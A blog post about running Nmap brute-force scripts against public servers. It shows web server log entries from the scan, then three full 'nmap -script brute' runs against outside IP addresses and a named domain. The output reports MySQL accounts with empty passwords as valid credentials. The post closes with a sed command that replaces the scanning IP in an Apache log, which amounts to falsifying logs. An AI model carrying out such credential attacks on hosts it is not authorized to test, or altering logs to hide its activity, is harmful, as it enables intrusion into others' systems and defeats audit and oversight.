Posted: . At: 11:26 AM. This was 4 months ago. Post ID: 19031
Page permalink. WordPress uses cookies, or tiny pieces of information stored on your computer, to verify who you are. There are cookies for logged in users and for commenters.
These cookies expire two weeks after they are set.



Sponsored



Scanning websites with Nmap is a lot of fun.

by

Using Nmap to scan a website server can return some useful information. Below is what an Nmap scan looked like in the web server logs. This is very interesting.

10.12.141.56 - - [11/Jan/2024:18:21:23 -0500] "\x16\x03" 400 422 "-" "-"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET / HTTP/1.1" 200 6277 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET /~1*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET /administrator/index.php HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET /wp-login.php HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:24 -0500] "GET / HTTP/1.1" 200 6277 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:25 -0500] "GET /~1/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:25 -0500] "GET /~2*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:26 -0500] "GET /~2/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:27 -0500] "GET /~3*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:27 -0500] "GET /~3/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:28 -0500] "GET /~4*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:29 -0500] "GET /~4/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:29 -0500] "GET /~5*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:30 -0500] "GET /~5/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:31 -0500] "GET /~6*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:31 -0500] "GET /~6/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:32 -0500] "GET /~7*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:33 -0500] "GET /~7/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:33 -0500] "GET /~8*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:34 -0500] "GET /~8/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:35 -0500] "GET /~9*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:35 -0500] "GET /~9/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:36 -0500] "GET /~10*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:37 -0500] "GET /~10/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:37 -0500] "GET /~11*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:38 -0500] "GET /~11/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:39 -0500] "GET /%3f*~11*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:40 -0500] "GET /%3f*~10*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:40 -0500] "GET /%3f*~9*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:41 -0500] "GET /%3f*~8*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:42 -0500] "GET /%3f*~7*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:42 -0500] "GET /%3f*~6*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:43 -0500] "GET /%3f*~5*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:44 -0500] "GET /%3f*~4*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:44 -0500] "GET /%3f*~3*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:45 -0500] "GET /%3f*~2*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.12.141.56 - - [11/Jan/2024:18:21:46 -0500] "GET /%3f*~1*/*.aspx?aspxerrorpath=/ HTTP/1.1" 404 6284 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"

I was using a brute force script and this made the web server very unhappy. This is an example Nmap brute force scan, this is useful for returning a list of all usernames in a MySQL database if it is exposed to the Internet.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.29.118.12)sudo nmap 91.132.86.243 -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 10:21 AEDT
Nmap scan report for 91.132.86.243
Host is up (0.31s latency).
Not shown: 987 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
| ssh-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 43 guesses in 39 seconds, average tps: 1.3
|_  ERROR: The service seems to have failed or is heavily firewalled...
25/tcp    open     smtp
| smtp-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
53/tcp    open     domain
80/tcp    open     http
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
| http-brute:   
|_  Path "/" does not require authentication
110/tcp   open     pop3
| pop3-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 498 guesses in 617 seconds, average tps: 0.7
143/tcp   open     imap
| imap-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
443/tcp   open     https
| http-brute:   
|_  Path "/" does not require authentication
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
587/tcp   open     submission
| smtp-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
646/tcp   filtered ldp
993/tcp   open     imaps
|_imap-brute: ERROR: Script execution failed (use -d to debug)
995/tcp   open     pop3s
| pop3-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 14 guesses in 28 seconds, average tps: 0.5
|_  ERROR: Failed to connect.
10000/tcp open     snet-sensor-mgmt
20000/tcp open     dnp
 
Nmap done: 1 IP address (1 host up) scanned in 641.21 seconds

This is an example of the brute force results. This has found a MySQL instance and valid user accounts exposed to the Internet.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~)-(172.29.123.37)sudo nmap demotrend.com -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 11:01 AEDT
Nmap scan report for demotrend.com (193.111.77.5)
Host is up (0.36s latency).
rDNS record for 193.111.77.5: biricloud.com
Not shown: 893 filtered tcp ports (no-response), 35 filtered tcp ports (admin-prohibited), 61 closed tcp ports (reset)
PORT     STATE SERVICE
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
| http-brute:   
|_  Path "/" does not require authentication
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
110/tcp  open  pop3
| pop3-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 6 guesses in 32 seconds, average tps: 0.2
|_  ERROR: Failed to connect.
143/tcp  open  imap
| imap-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
443/tcp  open  https
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
| http-brute:   
|_  Path "/" does not require authentication
465/tcp  open  smtps
587/tcp  open  submission
993/tcp  open  imaps
| imap-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
995/tcp  open  pop3s
| pop3-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 8 guesses in 33 seconds, average tps: 0.2
|_  ERROR: Failed to connect.
3306/tcp open  mysql
| mysql-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 26 guesses in 314 seconds, average tps: 0.1
| mysql-enum: 
|   Valid usernames: 
|     webadmin:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|_  Statistics: Performed 183 guesses in 310 seconds, average tps: 0.4
 
Nmap done: 1 IP address (1 host up) scanned in 344.81 seconds

Another brute forcing example.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~)-(172.29.123.37)sudo nmap 85.190.158.85 -P0 -script brute
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-12 11:10 AEDT
Nmap scan report for 85.190.158.85
Host is up (0.23s latency).
Not shown: 816 filtered tcp ports (no-response), 181 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 10442 guesses in 600 seconds, average tps: 17.3
3306/tcp open  mysql
| mysql-brute: 
|   Accounts: No valid accounts found
|   Statistics: Performed 0 guesses in 1 seconds, average tps: 0.0
|_  ERROR: The service seems to have failed or is heavily firewalled...
| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     administrator:<empty> - Valid credentials
|     webadmin:<empty> - Valid credentials
|     admin:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
8443/tcp open  https-alt
 
Nmap done: 1 IP address (1 host up) scanned in 610.83 seconds

This is how to search and replace an IP address in an Apache log file.

╭──(john㉿DESKTOP-PF01IEE)───╮
╰───────────────────────────╾╯(~/Documents)-(172.29.118.12)sed -i "s/10.12.141.56/193.10.128.13/g" log.txt

That would be a very useful trick for editing an Apache log file. The changes will be written back to the log.txt file.


Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.